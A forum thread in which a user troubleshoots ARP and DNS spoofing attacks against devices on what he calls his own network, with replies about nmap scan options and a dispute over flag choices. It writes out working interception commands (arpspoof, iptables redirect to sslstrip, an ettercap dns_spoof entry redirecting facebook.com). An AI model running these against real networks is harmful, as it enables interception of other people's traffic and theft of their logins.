Arp Blocked Against OSX

[prelite]

Hi guys
I'm testing some attacks against the machines of my private network.
I've got 1 xp machine 1 seven machine 1 ipad 1 Mac Book Pro and 1 android phone.
In the last 2 days I stresstested theese pcs with dns spoofing (ettercap).
Microsoft OS Machines are completely "spoofable" but there's no way to redirect traffic of OSX and android machines.
Are there any spacial commands to run to complete an attack against non Microsoft OS Machines??

[saxsos]

If you're on a switched LAN you can try with macof

[maverik35]

I've been able to spoof mac osx in one ocation, and sniff..Also with android cell phones...

Have you tried nmap this 2 devices and see what is at their ports?..Need to see what is going on in those devices...Make a deep scan:

nmap -sC -sS -sV -PN -p- -T4 -O --osscan-guess xxx.xxx.xxx.xxx,xxx (Put here the ip of MacOSX and the Android: 192.168.1.120,121) or one by one.

...It will take some time since it will scan not only the first 1024 ports and some high ports (nmap Default) , but all 65535 ports.

Then analyze the info. There must be something listening in ports, some aplication or something avoiding the ARP Poissoning.

Also use the arp -a and the Wireshark to analyze ports and arp protocols.

[thorin]

@prelite

Microsoft OS Machines are completely "spoofable" but there's no way to redirect traffic of OSX and android machines.

Please be more specific. What did you try? What happened when you tried? etc.

@all / @maverik35
Just to simplify if you're going to do script scanning (-sC), version detection (-sV), and OS fingerprinting (-O) you may as well just use the -A switch and shorten things up:

Code:

nmap -sS -PN -p- -T4 -A --osscan-guess xxx.xxx.xxx.xxx,xxx

Further since it's the OP's own network there's no reason to be at all polite in the timing: may as well use -T5, and chances are you don't need to resolve host names so save yourself some time by adding -n for no DNS resolution.

Lastly while I believe -PN still works and will continue to for a number of future versions, you may want to start using -Pn as they're trying to be consistent across options and how things are enabled/disabled. (You can see from nmap --help this has been changed recently.)

[prelite]

First of all I wanna thank you all for your answer.
Please excuse me if I write you back late but the last week I was on holiday.

Please be more specific. What did you try? What happened when you tried? etc.

Here it is what I actually try:

Code:

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 --> Also tried with port 8080 or 443
sslstrip -l 10000
arpspoof -i wlan0 -t victimIP routerIP

or this:

Code:

echo 1 > /proc/sys/net/ipv4/ip_forward
locate etter.nds
nano /usr/share/ettercap/etter.dns 
For exemple I put the follow line in the file etter.dns
*.facebook.com	A	XXX.XXX.XXX.XXX
ettercap -T -q -i wlan0 -P dns_spoof -M arp // //

With the arpspoof, sslstrip doesn't write anything in the log file and with the ettercap the victim osx/android PC/smartphone doesn't redirect the request for facebook.com to XXX.XXX.XXX.XXX.
This instead is the result of the command "nmap -sC -sS -sV -PN -p- -T4 -O --osscan-guess xxx.xxx.xxx.xxx" launched with the osx IP machine.

Code:

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-07-08 22:09 CEST
Warning: 192.168.XXX.XXX giving up on port because retransmission cap hit (6).
Nmap scan report for 192.168.XXX.XXX
Host is up (0.0030s latency).
All 65535 scanned ports on 192.168.XXX.XXX are closed (65484) or filtered (51)
MAC Address: F0:B4:79:XX:YY:ZZ (Apple)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 717.49 seconds

I'm all ears guys.

[thorin]

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 --> Also tried with port 8080 or 443
sslstrip -l 10000
arpspoof -i wlan0 -t victimIP routerIP

Someone correct me if I'm wrong ... I've never futzed with sslstrip but looking at this it seems like you're trying to take traffic which was destined for port 80 (regular HTTP not HTTPS) and send it to sslstrip ... what good is that?

[prelite]

Someone correct me if I'm wrong ... I've never futzed with sslstrip but looking at this it seems like you're trying to take traffic which was destined for port 80 (regular HTTP not HTTPS) and send it to sslstrip ...

That's right, I'm trying to catch that kind of traffic but with the Microsoft PC it works and with the OSX or Android Machines doesn't...why?

[maverik35]

@prelite
Please be more specific. What did you try? What happened when you tried? etc.

@all / @maverik35
Just to simplify if you're going to do script scanning (-sC), version detection (-sV), and OS fingerprinting (-O) you may as well just use the -A switch and shorten things up:

Code:

nmap -sS -PN -p- -T4 -A --osscan-guess xxx.xxx.xxx.xxx,xxx

Further since it's the OP's own network there's no reason to be at all polite in the timing: may as well use -T5, and chances are you don't need to resolve host names so save yourself some time by adding -n for no DNS resolution.

Lastly while I -PN still works and will continue to for a number of future versions, you may want to start using -Pn as they're trying to be consistent across options and how things are enabled/disabled. (You can see from nmap --help this has been changed recently.)

I do not agree with you in your statements. Why? IWhen I first got to know about nmap, I read a metasploit video (4 videos) one of them was explained by the guy who wrote the SET..In the video he uses the same as I did above..And I saw the Fyododr video using the -A option, which indeed included some options. Why the other guy uses all the parameters instead of doing it like Fyodor?...If that will make my nmap output to have wrong info, I better use the -A option...

Why use sslstrip -l 10000?..It is a default, you do not need to do so..But does it hurts?..Redundant?...Does it work?...Yes, all of the above, as long as you know it is redundant, that it does not affect your output...

What if I want to use DNS?..It is important to me, perhaps not to you...It depends on the people's own choice.

If I want to be polite in timming?..Does it hurts?...If so, then let's get rid of -T1 to 4 and lets just use T5...For some reason there are all parameters available.. Because we all can use them as we think it can work best for us.

I use -sC because if there is a pC using ssh, you can see some important info...I do not have to use some script if not needed, I'm not obligated to use them just because I use -sC...As long as you know you can use scripts...

Yours is the best way?...

Not to me...Sure it is another way, yes..But best?...Not to me...

[thorin]

I do not agree with you in your statements. Why? IWhen I first got to know about nmap, I read a metasploit video (4 videos) one of them was explained by the guy who wrote the SET..In the video he uses the same as I did above..And I saw the Fyododr video using the -A option, which indeed included some options. Why the other guy uses all the parameters instead of doing it like Fyodor?...If that will make my nmap output to have wrong info, I better use the -A option...

Your right, things never change or evolve in IT, why should you adapt or learn?

Why use sslstrip -l 10000?..It is a default, you do not need to do so..But does it hurts?..Redundant?...Does it work?...Yes, all of the above, as long as you know it is redundant, that it does not affect your output...

Did someone ask about that part? I musta missed it.

What if I want to use DNS?..It is important to me, perhaps not to you...It depends on the people's own choice.

Go for it, I never said you can't or shouldn't....I said "Further since it's the OP's own network ... chances are you don't need to resolve host names so save yourself some time by adding -n for no DNS resolution."

If I want to be polite in timming?..Does it hurts?...If so, then let's get rid of -T1 to 4 and lets just use T5...For some reason there are all parameters available.. Because we all can use them as we think it can work best for us.

Again I didn't say NOT to use it as you suggested, I said "urther since it's the OP's own network there's no reason to be at all polite in the timing: may as well use -T5".

I use -sC because if there is a pC using ssh, you can see some important info...I do not have to use some script if not needed, I'm not obligated to use them just because I use -sC...As long as you know you can use scripts...

AGAIN, I never said you couldn't use -sC, I was simply pointing out that you can simplify things as -A is the same as doing -O -sC -sV.

Yours is the best way?...

I never claimed it was, I was simply trying to streamline things for people and increase people's pool of knowledge. But again take the advice or don't it doesn't affect me in anyway.

Not to me...Sure it is another way, yes..But best?...Not to me...

Wow, you just keep going and going eh? Do it however you like. Some people like to increase their knowledge pool and learn new or different ways to do things, others just do things the same way all the time. I guess you do it the same way you saw it in some tutorial along the way, hopefully nothing will ever change, and it'll never fail to work how you originally learned it.

BTW the word "best" doesn't appear in this thread until your post....

[thorin]

Someone correct me if I'm wrong ... I've never futzed with sslstrip but looking at this it seems like you're trying to take traffic which was destined for port 80 (regular HTTP not HTTPS) and send it to sslstrip ...

That's right, I'm trying to catch that kind of traffic but with the Microsoft PC it works and with the OSX or Android Machines doesn't...why?

Well if you're taking regular HTTP not HTTPS traffic and sending it to sslstrip, what's it going to strip?